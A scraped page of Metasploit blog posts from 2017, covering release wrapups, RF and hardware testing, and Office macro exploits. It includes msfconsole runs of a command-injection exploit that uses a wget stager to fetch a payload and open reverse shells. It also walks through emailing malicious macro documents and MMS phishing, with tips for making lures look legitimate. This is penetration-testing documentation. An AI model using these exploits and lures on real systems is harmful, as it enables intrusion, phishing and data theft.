Skip navigation
All Places > Metasploit > Blog
1 2 3 Previous Next

Metasploit

684 posts
egypt

Metasploit Wrapup

Posted by egypt Employee Mar 24, 2017

Faster, Meterpreter, KILL! KILL!

You can now search for and kill processes by name in Meterpreter with the new pgrep and pkill commands. They both have flags similar to the older ps command, allowing you to filter by architecture (-a), user (-u), or to show only child processes of the current session's process (-c). We've also added a -x flag to find processes with an exact match instead of a regex, if you're into that.

 

Fun with radiation

radio-stylin.jpg

Craig Smith has been killing it lately with all his hardware exploitation techniques. Check out his post from earlier this week for details of his latest work on integrating radio reconaissance with Metasploit via the HWBridge, including crafting and examining radio frequency packets, brute force via amplitude modulation, and more!

 

Java web things

 

This update includes modules for two fun Java things: Struts2 and WebSphere.

 

Struts is a Java web application framework often deployed on Tomcat, but it can run on any of the various servlet containers out there. The bug is in an error handler. Basically, if the Content-Type header sent by the client is malformed, it will cause an exception and send a stack trace back to the client. As part of its rendering process, Struts will treat the value of the header as part of a template. Templates can contain Object-Graph Navigation Language (OGNL) expressions meaning we get full code execution as the user running the web process. The exploit for this drops a file and runs it so your shells can strut their stuff.

 

WebSphere is an application server manager. It is particularly interesting because it is often used to deploy code to clusters of application servers, which means popping one box can potentially give you code execution on dozens more.

 

You used to pwn me on my cell phone

 

While MMS messages aren't as common of a phishing vector as email, they can potentially be highly successful late at night when you need those shells. Now you can send SMS and MMS messages with Metasploit, using any SMTP server including GMail or Yahoo servers. Pair this with a malicious attachment such as the one generated by android/fileformat/adobe_reader_pdf_js_interface, or a link to the Stagefright browser exploit (android/browser/stagefright_mp4_tx3g_64bit), and get that holla back.

 

New Modules

 

Exploit modules (6 new)

Auxiliary and post modules (10 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Currently, phishing is seen as one of the largest infiltration points for businesses around the globe, but there is more to social engineering than just phishing. Attackers may use email and USB keys to deliver malicious files to users in the hopes of gaining access to an organization’s network. Users that are likely unaware that unsolicited files, such as a Microsoft Word document with a macro, may be malicious and can be a major risk to an organization. Metasploit Pro can assist in the education of employees about these attack vectors.

 

Metasploit Pro’s Social Engineering functionality is often used for its phishing capabilities, but it has other options - such as USB key drops and emailing of malicious files - that are able to obtain sessions on a target’s device. As part of an internal training engagement or penetration test, these features will give more insight into the organization’s defenses against social engineering attacks. This post will cover emailing malicious files utilizing the current Microsoft Word macro file format module.

 

To begin, start a new custom campaign and configure your email starting with the email header and target list, similar to a phishing campaign. For Attack Type, select Attach File, give the attachment a name and select File format exploit.

 

Screen Shot 2017-03-17 at 10.55.18 AM.jpg

 

Search for “macro” and select “Microsoft Office Word Malicious Macro Execution”. This will create a Microsoft Word document with a macro that will deliver a payload and open a shell back to Metasploit Pro. Configure your target settings (I’ll be using the OS X Python target for this example) and payload options. Then use the “BODY” field for the content of the Word document. (You can use plain text or xml formatted data, which will be injected between the <p> and </p> tags of the Word xml document.) And click OK.

 

Screen Shot 2017-03-17 at 10.40.45 AM.jpg

 

Click “NEXT” and format your email. Save your changes and configure your email server if you haven’t done so already.

 

Launch your campaign and the email(s) will be sent to all the members of your target list and a listener will be opened for the payload. The recipients will need to enable macros in order for the payload to launch. All those that enable the macro on the specified platform will have a shell that connects back to your Metasploit instance.

 

Screen Shot 2017-03-17 at 11.03.25 AM.jpg

 

Your campaign findings will list the number of targets, recipients that opened the email and number of sessions opened. If any sessions are opened, you’ll be able to interact with that session as you would any others via the Sessions page.

 

Screen Shot 2017-03-17 at 10.49.25 AM.jpeg

 

And there you have it. Metasploit has successfully sent malicious files and opened sessions on remote targets via the Social Engineering feature without attempting a phish.

 

For more on the Microsoft Office Word Malicious Macro Execution module, see sinn3r’s post here: https://community.rapid7.com/community/metasploit/blog/2017/03/08/attacking-micr osoft-office-openoffice-with-metasploit-macro-exploits

 

Interested in learning more about Metasploit Pro’s phishing capabilities? Watch the video below to see how easy it is to build a phishing campaign targeting your users to test their ability to detect malicious emails:

 

 

 

The rise of the Internet of Things

We spend a lot of time monitoring our corporate networks. We have many tools to detect strange behaviors. We scan for vulnerabilities. We measure our exposure constantly. However, we often fail to recognize the small (and sometimes big) Internet of Things (IoT) devices that are all around our network, employees, and employees’ homes. Somewhat alarmingly – considering their pervasiveness — these devices aren’t always the easiest to test.

 

Though often difficult, it is technically possible to find and identify some of these IoT devices via their Ethernet side connection. But that doesn’t always give us a full picture of the risk these devices present to consumers or organizations. When assessing only Ethernet connected devices you can miss the wireless world that can have a major impact on the security of your organization. Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas.

 

Which leaves us with one very critical question: how do you really determine the risk of these devices?

 

Let’s start with the basics:

  • What do these connected devices do?
  • What is the range of exposure of these devices?
  • Does the device have wireless capabilities?

 

Traditionally, we often perform perimeter scans of our 802.11 wireless networks to ensure our Access Points are secure and the network bleed isn’t too large. We can monitor these Access Points (APs) to create overlap in case one goes down or gets interference from a nearby kitchen microwave.

 

However, if you’re asking yourself, “but what about the rest of the wireless spectrum?” that’s exactly the position we found ourselves in.

 

Radio, radio, everywhere

Chances are your company and employees are already using many other radio frequencies (RFs) outside of the standard 802.11 network for various reasons. Perhaps you have a garage door with a wireless opener? Company vehicle key fobs? Not to mention RFID card readers, wireless security systems, Zigbee controlled lights, or HVAC systems.

 

What are the ranges for these devices? Are they encrypted or protected? What happens when they receive interference? Do they fail in a closed or open state?

 

The inability to effectively answer these questions (easily or even at all) is the very reason we are releasing the RFTransceiver extension for Metasploit’s Hardware Bridge, and why we think this will be a critical tool for security researchers and penetration testers in understanding the actual attack surface.

 

Now, security teams will be able to perform a much broader assessment of a company’s true security posture. They will be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.

 

Sunlight is the best disinfectant

Much of the activity undertaken in the name of security research can be contentious, divisive, or hard to understand. This is certainly true of RF testing, an area of research becoming both more prevalent and increasingly necessary as we see more and more technologies leveraging RF communications.

 

The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.

 

This is the logic behind Metasploit, as well as what drives Rapid7’s extensive vulnerability research efforts. It is also the reasoning behind the RFTransceiver. We strongly believe that RF testing is an incredibly important – though currently often overlooked – component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.

 

To provide an example of this kind of testing, in 2016, Rapid7’s Jay Radcliffe disclosed vulnerabilities in Johnson & Johnson’s Animas OneTouch Ping insulin pump. The popular pump has a blood glucose meter that serves as a remote control via radio frequency in a proprietary wireless management protocol. Communications between the pump and the remote control are sent in cleartext, rather than being encrypted. This creates an opportunity for an attacker with the right technical skills and resources, opportunity, and motive to spoof the Meter Remote and trigger unauthorized insulin injections.

 

While Jay considered the likelihood of an attacker exploiting these vulnerabilities in the wild to be quite low, it could seriously harm a patient using the technology. Fortunately, Jay’s research uncovered the problem and he was able to work with Johnson & Johnson to notify patients and advise them of ways to mitigate the risk. Without RF testing, these vulnerabilities would have continued to go unnoticed, and patients would not have the opportunity to make informed choices to protect themselves.

 

How it works

Just one quick author’s note before we get into the ‘how-to’ portion. Rapid7 does not sell the hardware required to perform RF testing. The required hardware can be found at any number of places, including Hacker Warehouse, Hak5, or any electronics store that carries software defined radios or RF transmitter hobbyist equipment.

 

With the RFTransceiver, security pros have the ability to craft and monitor different RF packets to properly identify and access a company’s wireless systems beyond Ethernet accessible technologies.

 

The first RFTransceiver release supports the TI cc11xx Low-Power Sub-1GHz RF Transceiver. The RFTransceiver extension makes it possible to tune your device to identify and demodulate signals. You can even create short bursts of interference to identify failure states. This release provides a full API that is compatible with the popular RfCat python framework for the TI cc11xx chipsets. If you have existing programs that use RfCat you should be able to port those into Metasploit without much difficulty. This release comes with two post modules: an Amplitude Modulation based brute forcer (rfpwnon) and a generic transmitter (transmitter).

 

How to use RFTransceiver

Using the new RFTransceiver extension requires the purchase of an RfCat-compatible device like the Yard Stick One. Then download the latest RfCat drivers, included with those drivers you will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.

 

Then you can connect with the hardware bridge:

RFTranceiver Usage

$ ./msfconsole -q

msf > use auxiliary/client/hwbridge/connect

msf auxiliary(connect) > run

 

[*] Attempting to connect to 127.0.0.1...

[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-02-16 20:04:57 -0600

[+] HWBridge session established

[*] HW Specialty: {"rftransceiver"=>true}  Capabilities: {"cc11xx"=>true}

[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge

[!]          could have real world consequences.  Use this module in a controlled testing

[!]          environment and with equipment you are authorized to perform testing on.

[*] Auxiliary module execution completed

msf auxiliary(connect) > sessions

 

Active sessions

===============

 

  Id  Type                   Information    Connection

  --  ----                   -----------    ----------

  1   hwbridge cmd/hardware  rftransceiver  127.0.0.1 -> 127.0.0.1 (127.0.0.1)

 

msf auxiliary(connect) > sessions -i 1

[*] Starting interaction with 1...

 

hwbridge > status

[*] Operational: Yes

[*] Device: YARDSTICKONE

[*] FW Version: 450

[*] HW Version: 0348

 

To learn more about the RFTransceiver, you can download the latest Metasploit here: https://www.rapid7.com/products/metasploit/download/community/

Spend the summer with Metasploit

 

I'm proud to announce that the Metasploit Project has been accepted as a mentor organization in the Google Summer of Code! For those unfamiliar with the program, their about page sums it up nicely:

Google Summer of Code is a global program focused on introducing students to open source software development. Students work on a 3 month programming project with an open source organization during their break from university.

 

This is an amazing program that helps remove the financial barriers of contributing to Open Source. Basically how it works is you (a university student) work on an Open Source project over the summer (12 weeks) with a mentor who has experience working on that project. As long as you keep at it and hit your milestones, Google gives you money along the way based on performance. Pay your rent, stock the fridge, get coffee, whatever.

 

Open Source is the heart of the Metasploit community, but it's more than that to me. It's the means by which we, as programmers, can help improve the world a little bit at a time. We all stand on the shoulders of giants, building greater things because others before us have built great things. Like many OSS contributors, I personally started contributing to an Open Source project because it allowed me to get my work done more efficiently. By working together on Open Source, we can help others get their work done too, and enable them to build greater things. By working on Metasploit in particular, you will be helping to democratize offensive security, improving the world by giving everyone access to the same techniques that bad guys use, so they can be better understood and mitigated.

 

If Metasploit is not where your heart lies, I encourage you to consider contributing to one of the other GSoC security projects.

 

We have a list of project ideas that will have you writing some awesome code for great justice. Most everything requires at least a little Ruby, but if you're more comfortable in C or Python, there are options for you as well. Whatever you choose, I'm super excited to see what you will accomplish.

 

Important dates to know:

  • Student Application Period - March 20, 2017 - April 3, 2017
  • Student Projects Announced - May 4, 2017

 

If you are interested in participating, you should definitely check out the rest of the GSoC timeline. You will need to apply to us and also through GSoC's application page when it goes live next week on March 20th.

 

So please come work with us. Be the shoulders others can stand on.

William Webb

Metasploit Weekly Wrapup

Posted by William Webb Employee Mar 10, 2017


interrupt.jpeg

The last couple of weeks in the infosec world have appeared busier, and buzzier, than most others.  It seems almost futile to pry everyone away from the current drama--that being the bombshell revelation that intelligence agencies collect intelligence--long enough to have them read our dev blog.  Regardless, we've been busy ourselves.  And if you're the least bit like me, you could probably use a quick respite from the cacophony.  Keeping up with all the noise is enough to make anyone feel like Ricky:

 

rickym.png

This is Ricky.  Don't be like Ricky.

 

Features and Fixes

 

There are few things worse than getting a Meterpreter session on a host, only to find yourself unable to download large files that you might be interested in because your connection is spotty.  Unfortunately, download timeouts in such sessions have been a reality for as long as Meterpreter has been around.  Thankfully, a recent patch by Pearce Barry goes a long way to alleviate said issues by providing more fault tolerance to adverse network conditions.  I personally tested this on over 1GB of data across a network link with 20% packet loss, and while it felt like I was using CompuServe once again, it delivered the goods.

 

Other issues addressed include a fix by mrjefftang for an issue in BrowserExploitServer.  Instead of delivering the obfuscated Javascript from JSObfu, raw Javascript was mistakenly being sent.  Good catch.  Also, a major rewrite of the reverse_shell_jcl payload was submitted by bigendiansmalls and merged.  Functionally, it behaves the same as the previous iteration; however, the actual code is much cleaner and easier to maintain.  So if you haven't tried your hand at IBM mainframe hacking, it's now even easier to jump right in.

 

A Requiem for Meterpreter Scripts

 

We obliterated what we believe to be the last vestige of Meterpreter scripts in framework.  In their time, an exploit module may have used migrate -f to automatically migrate the session to another process on the target.  This is now handled by 'post/windows/manage/priv_migrate', and has been for some time.  The old migrate -f argument set in InitialAutoRunScript was pointed at this new module; however, there's been a few hiccups over the last few weeks.  That's been corrected, and all should now be right with Windows process migration.  Note: This doesn't mean that your personal custom scripts will stop working. Scripts are still a handy way to bust out a prototype to get stuff done quickly without needing to care about the reliability requirements of a post module.

 

In other assorted bugfix news, Brendan Watters resolved an issue that occurred when sorting tables from auxiliary modules when the results contained both IPv4 and IPv6 addresses.  We also updated Metasploit to use the latest Nexpose client libraries, so it's now able to validate that it's communicating with a trusted Nexpose instance via preconfigured SSL certificates.

 

Docker!

 

One final item in this release was the addition of a basic Dockerfile and Docker Compose configuration.  With support for Docker, you can now isolate your Metasploit instances, and it allows you to both quickly and easily setup new testing and development environments.  Plans are in the works to publish the container to hub.docker.com, and users will be able to deploy new installations of Metasploit Framework just as easily as they would other applications using Docker.

 

New Modules

 

Exploit modules (5 new)

Auxiliary and post modules (2 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

 

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

 

That's all for now.  Stay tuned, as we have several interesting projects in the works that should be debuting in the coming weeks.

office_icon.pngIt is fair to say that Microsoft Office and OpenOffice are some of the most popular applications in the world. We use them for writing papers, making slides for presentations, analyzing sales or financial data, and more. This software is so important to businesses that, even in developing countries, workers that are proficient in an Office suite can make a decent living based on this skill alone.

 

Unfortunately, high popularity for software also means more high-value targets in the eyes of an attacker, and malware-infested Office macros are like an irritating rash that doesn't go away for IT professionals.

 

A macro is a feature that allows users to create automated processes inside of a document used by software like Microsoft Word, Excel, or PowerPoint. This is used to enhance user experience, increase productivity, or automate otherwise manual tasks. But, in other words, it executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter session!

 

Macro attacks are nothing new or unusual. A typical attack usually involves embedding malicious macro code in an Office document, sending it to the victim, and asking him or her very nicely to enable that code. The saddest part isn't how lame the attack is, since you are basically begging the victim to run your malware. It's that people have been falling for this trick for decades!

 

The impact of such attacks should not be underestimated. In fact, malicious macros are often used in ransomware, and other high-profile breaches. For example, the Cerber Ransomware was a macro attack against Office 365 that put millions of users at risk. Since Office 365 is extremely popular in businesses, we expect it to be one of malicious macros' favorite audiences for quite some time.

 

Yup, I think people call that social-engineering, and apparently it always works. I figured: "ok, why not, a shell is a shell. Let me write some exploits for these"... and that's how Metasploit's macro exploits were born:

 

The Microsoft Office Macro Exploit

This Microsoft Office macro exploit is specifically written for the Word document format. It has been tested against these environments:

 

  • Microsoft Office 2010 for Windows
  • Microsoft Office 2013 for Windows
  • Microsoft Office 2016 for Windows
  • Microsoft Office Word for Mac OS X 2011

 

The following demonstrates how to create a macro exploit for Microsoft Office for OS X, setting up a handler, as well as obtaining a session:

 

msft_osx_macro_demo.gif

 

If you actually have a valid certificate to sign the malicious macro, you can actually apply that by using Microsoft Office to sign it. Having a valid cert will not have the "Enable Content" prompt, Microsoft Office will just execute your code by default. However, this is obviously only ideal for internal use. Good certificates are expensive.

 

The OpenOffice Macro Exploit

The Apache OpenOffice macro exploit is specifically written for OpenOffice Writer (odt). It has been tested against these environments:

 

  • Windows with Powershell support (which should be the case since Windows 7)
  • Ubuntu Linux (which ships LibreOffice by default)
  • OS X

 

Unlike Microsoft, OpenOffice actually does not want to open any documents with macros, which means in order to attack, the victim has to manually do the following in advance:

 

1. Choose Tools -> Options -> Security

2. Click the Macro Security button

3. Change the security level to either medium to low.

 

If the security level is set to medium, a prompt is presented to the user to either allow or disallow the macro. If set to low, the macro will run without warning.

 

Now let's talk about how to use the exploit. The design for it is actually different than the Microsoft one: not only will it create the malicious document file, the module will also spawn a web server, and a payload handler. The purpose of the web server is when the victim runs the macro, the malicious code will download the final payload from our web server, and execute it. The following demonstrates how to use the exploit:

 

openoffice_demo.gif

 

Exploit Customization

Although the Metasploit macro exploits work right out of the box, some cosmetic customizations are probably necessary to make the document look more legit and believable.

 

To do this, you will need a copy of either Microsoft Office or OpenOffice (depending on the type of exploit you're using), and then:

 

  1. Generate the exploit
  2. Move the exploit to a platform with Office that can edit the document
  3. Open the document with Office, do your editing there. When you're done, simply click save. As long as you're not modifying the macro, it should still work

 

Time to Play!

Congratulations, young grasshopper! If you've read this far, and have not fallen asleep, then you are ready to start your journey of sweet Office macro pwnage. But before you leave, if you have never used Metasploit - a cyber weapon forged in the fires of um... Austin, Texas - then you shall download it here. If you already possess such power, then we strongly recommend you run msfupdate.

 

Go now, embrace your destiny of pwnage, and let that glory be yours with Metasploit Office macro exploits.

Penetration testing with Metasploit made easy.

 

Millions of IT professionals all over the world want to get into the hot field of security, and Metasploit is a great place to start. Metasploit Framework is free, used by more penetration testers than any other tool, and helps you understand security from the attackers perspective. There’s one problem: it's hard to use Metasploit without vulnerable services to play against.

 

To help, the Metasploit team has created vulnerable OS images (Metasploitable2 and Metasploitable3), each containing dozens of vulnerable services that a user can cut his/her teeth with. However, these images contain small subset of the thousands of Metasploit modules available for users. You may wonder why we don't have vulnerable services available for testing and training every module. The reason is simple: it can be very time-consuming and difficult to configure vulnerable services. First, you have to obtain the vulnerable software, and then install, and configure each service. Sometimes, older software is simply unavailable for download, either because it is too old, or because the vendor removed it for security reasons. Depending on the software, setting up even one vulnerable service can take hours, if not days. While Metasploitable VMs makes the job of setting up your first vulnerability lab much easier, it is still not simple.

 

We developed the Vulnerable Services Emulator to fill this gap. It is a framework that makes it easy to emulate the vulnerable services for penetration testing purposes.  Right now, it emulates over 100 vulnerable services, covering things like compromising credentials, getting a shell from the victim, and more. After going through module exercises, users can learn details about security vulnerabilities and how to test them, and are encouraged to continue to learn and play with Metasploit’s capabilities. It is like a high-interaction honeypot, but specially tuned to be exploitable.

 

This tool is very easy to install and use.  All you need to run it is a working Perl installation for your favorite OS (Windows, Mac or Linux). Directions for installing the tool, which only takes a minute, are on Github page for this project.

 

In addition to learning, the emulator can be used to perform system testing on Metasploit modules themselves, providing feedback to the community on how to make modules more effective. But, the ultimate goal of the project is to help the community learn and make it even easier to get into penetration testing and Metasploit!

 

Example Usage

 

Here we are emulating a vulnerable printer service that is targeted by the Metasploit module exploits/windows/iis/ms01_023_printer.  The IP address 0.0.0.0 means we will bind to 0.0.0.0, and be accepting connections on any network interface. The default IP to bind is “127.0.0.1” which only connects from the same host. This is more secure when your Metasploit instance is installed on the same server.

 

Screen Shot 2017-02-26 at 5.55.50 PM.png

 

Here is the Metasploit configuration, which is configured to target the emulated service. You can see a session is established.  Note that the commands are actually executed on the target, so please run this emulator in a safe environment if you don't want it to be owned :-)

Screen Shot 2017-02-26 at 6.00.57 PM.png

 

That’s pretty easy right? What’s even nicer about this framework how easy it is to develop a new emulated vulnerable service. We know developers have very different preferences on programming languages, so instead of implementing the vulnerable services using a particular language, the framework describes vulnerable service interactions in JSON. It’s not a programming language per se but it has enough logic for service emulation. The following is the description for the vulnerable printer service.

 

Simple JSON description on an emulated service

"exploits/windows/iis/ms01_023_printer": {

  "desc": "set payload windows/shell_reverse_tcp",

  "seq": [

    ["regex", "GET http:\/\/.*\/NULL.printer?"],

    ["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", ["action", ["connect", ":4444"]]]

  ]

},

 

In the above JSON code, the most important part is the “seq” section, which represents the sequence of messages used for the exploit.  It has an even number of entries (in this case, there are 2 entries). The odd-numbered entries are conditions. When a message comes in, it’s matched against the odd-numbered entries starting from the first; when there is a match, the corresponding even-numbered entries will be the action.  Typically, the action involves sending a response.  But it can also include an action such as making a new connection (like connecting back as a metepreter session in our case). This makes it easy to emulate vulnerable services and trigger them to set up a connection back to attacker.

 

At the core of the project, we implemented a framework (an interpreter) to execute the JSON based service description file. The current implementation is in Perl, but you can implement the framework in other programming languages of your choice.

 

The github project, we will have more technical details on the tool and its usage. It’s our hope that this tool can help you to enjoy a better learning experience in the exciting field of security and eventually become a security professional. Be sure to let us know if you have any feedback!

Pearce Barry

Weekly Metasploit Wrapup

Posted by Pearce Barry Employee Feb 23, 2017

I gave at the office

The office can be a popular place when it comes to giving. From selling kids' cookies/candy to raising awareness for a charity, the opportunity to 'give at the office' is definitely a thing. And now, thanks to Office macros, Metasploit offers a new way to give (and receive!) at 'the Office'.

 

These days, using malicious macros in office productivity programs is still a common attack vector. Designed with a handful of word-processing programs in mind (including some open source), Metasploit can now generate documents which utilize macros to execute an injected payload. Once a target receives and opens one of these documents (with macros enabled), the payload is executed, and now you have a shell or Meterpreter session (or whatever your payload is). Who says it's better to give than to receive?

 

 

When the sequel is better than the original

In the vein of "creative ways to achieve code execution on a MS SQL server", here's a new one which doesn't write to disk and works on a number of MS SQL versions. By setting up a stored procedure (with some pre-built .NET assembly code Metasploit provides) on the target, one can then issue a query containing an encoded payload, which will be executed as native shellcode by the stored procedure (woo!). Valid credentials with a certain level of privilege are required to use this new module, then you're good to go.

 

Screen Shot 2017-02-23 at 11.11.01 AM.png

 

Logins, logins, everywhere...

We've had a couple of good login-related fixes recently, including a fix to properly honor USER_AS_PASS and USER_FILE options when running a login scanner. Also of note is a fix to the owa_login module to properly handle valid credentials when a user doesn't have a mailbox setup. And if you'd rather skip logins entirely, grab yourself a misfortune cookie and check out the new authentication bypass RomPager module.

 

New Modules

Exploit modules (4 new)

Auxiliary and post modules (1 new)

 

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Metasploit Heart (1).pngValentines day is just around the corner! What could be a nicer gift for your sweetie than a bundle of new Metasploit Framework updates? The community has been as busy as ever delivering a sweet crop of sexy exploits, bug fixes, and interesting new features.

 

Everyone Deserves a Second Chance

Meterpreter Scripts have been deprecated for years in favor of Post Exploitation modules, which are much more flexible and easy to debug. Unfortunately, the Internet still abounds with blogs and other advice still recommending their use, and it is clear the word still hasn't gotten out.

 

In a previous Metasploit release, we attempted an experiment removing all of the scripts that already had Post Exploitation modules. Unfortunately, this caused even more confusion since it looked like Metasploit was broken. Now, Metasploit will kindly suggest that users explore the vast world of Post modules instead.

 

For now, all of the built-in Meterpreter scripts you know and love are back for one last dance, but you should really look at dumping those guys. Remember, there are many more Post modules in the sea!

 

Traverse your Way into my Life

With this release, we have a number of directory traversal updates, both offensive and defensive. First off, we have added a module for exfiltrating arbitrary data from a Cisco Firepower management console. The default credentials are also documented, so if you run into one of these in the wild, there is a good chance you can make a special connection.

 

And in the "it's not you, it's me" department, Justin Steven has been busy finding and fixing a number of directory traversal bugs in Metasploit's session handler, that can be exploited if you interact with a rogue Meterpreter session. Of course you should practice "safe sess(ions)", but if you can't, update your Metasploit Framework and get protected.

 

You Stole my Creds, my Phone, my Car, and my Heart

If you're looking for credentials to add to your little black book, Metasploit release also adds credential extraction modules for Advantech WebAccess, Metrocontrol Weblog, and Cisco Firepower Management Console. And once you have filled your cred list, you can now manipulate them in a more powerful way thanks to improvements in credential management.

 

Android Meterpreter adds a number of new features sure to make keeping up with your bae even easier (that doesn't sound creepy at all does it!) Android Meterpreter now supports stageless HTTPS, which makes it easier to keep your payloads secure, fast, and reliable. If you have trouble with your Android sessions falling asleep after you connect, keep them going all night (and day) long with the new wakelock command.

 

Christine-2.pngMetasploit makes its first foray into car hacking with a new hardware bridge session type, along with a number of new modules for administering and exploiting OBD-II / CANbus networks in modern vehicles. But, it's not limited to just these, you can add your own hardware devices by implementing the HWBridge specification. Don't let your car spoil your next date, hack back!

 

There are many more improvements and modules to enjoy as well, and they are all available now. So why not update your console with someone special, and make everyday a very special Metasploit Valentines day.

 

For full details, see the latest detailed Metasploit release notes: https://community.rapid7.com/docs/DOC-3575

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 27, 2017

Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.

 

Stageless mettle

The rewrite of meterpreter for POSIX systems, mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.

 

UDP pivoting

The new mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.

 

Android

Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege seperation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the put_user bug which was exploited in the wild in 2013, as well as updates to the towelroot exploit allowing it to target more devices.

 

This week's update adds CSV and vCard output formats to Android Meterpreter's dump_contacts command. This means you can now dump an Android device's contact list in an importable format.

 

Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the `dump_contacts` command now gives you the option of a normal text file, CSV, or vCard for the output format.

 

Here's how to use it:

 

meterpreter > dump_contacts -h
Usage: dump_contacts [options]
Get contacts list.

OPTIONS:

    -f   Output format for contacts list (text, csv, vcard)
    -h        Help Banner
    -o   Output path for contacts list


meterpreter > dump_contacts -f csv
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174248.csv
meterpreter > dump_contacts -f vcard
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174258.vcf

 

 

wget/curl command stagers

 

 

If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.

 

This update brings wget(1) and curl(1) command stagers (CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.

 

To use the new command stagers in your module, you can set flavor: wget or flavor: curl in your execute_cmdstager call, or you can set the flavor in CmdStagerFlavor in your info hash. Lastly, if you're already running the module, you can change the flavor with CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.

 

Here's an example of setting CMDSTAGER::FLAVOR:

 

msf > use exploit/linux/http/apache_continuum_cmd_exec 
msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129
rhost => 192.168.33.129
msf exploit(apache_continuum_cmd_exec) > set payload
linux/x64/mettle_reverse_tcp 
payload => linux/x64/mettle_reverse_tcp
msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget 
cmdstager::flavor => wget
msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1 
lhost => 192.168.33.1
msf exploit(apache_continuum_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Injecting CmdStager payload...
[*] Using URL: http://0.0.0.0:8080/XlM6PUw74P
[*] Local IP: http://192.168.1.3:8080/XlM6PUw74P
[*] Meterpreter session 1 opened (192.168.33.1:4444 ->
192.168.33.129:55171) at 2017-01-27 13:27:54 -0600
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > 

 

Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.

 

 

History command

Metasploit stores your msfconsole history in ~/.msf4/history but sometimes you only want dump out pieces of it. The new history command works similarly to the bash command of the same name letting you do just that.

 

workspace -v

The workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.

 

11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace
   default
   fbi
  * nasa
   wh.gov
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  -v
  Workspaces
  ==========
  current  name     hosts  services  vulns  creds  loots  notes
  -------  ----     -----  --------  -----  -----  -----  -----
           default  5      2         3      3      0      8
           fbi      98     165       49     155    301    72
  *        nasa     32     81        41     14     33     20
           wh.gov   1      9         0      0      0      0

11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >

 

 

to_handler command

Complementing the handler command is another new command, to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.

 

12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options
  Module options (payload/windows/meterpreter/reverse_https):
     Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST                      yes       The local listener hostname
    LPORT     8443             yes       The local listener port
    LURI                       no        The HTTP Path
12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1
LHOST => 192.168.99.1
12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > 
12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888
LPORT => 8888
12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler
[*] Payload Handler Started as Job 2
[*] Started HTTPS reverse handler on https://0.0.0.0:8888
[*] Starting the payload handler...
12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v
  Jobs
  ====
   Id  Name                    Payload                            Payload opts               URIPATH  Start Time                 Handler opts
   --  ----                    -------                            ------------               -------  ----------                 ------------
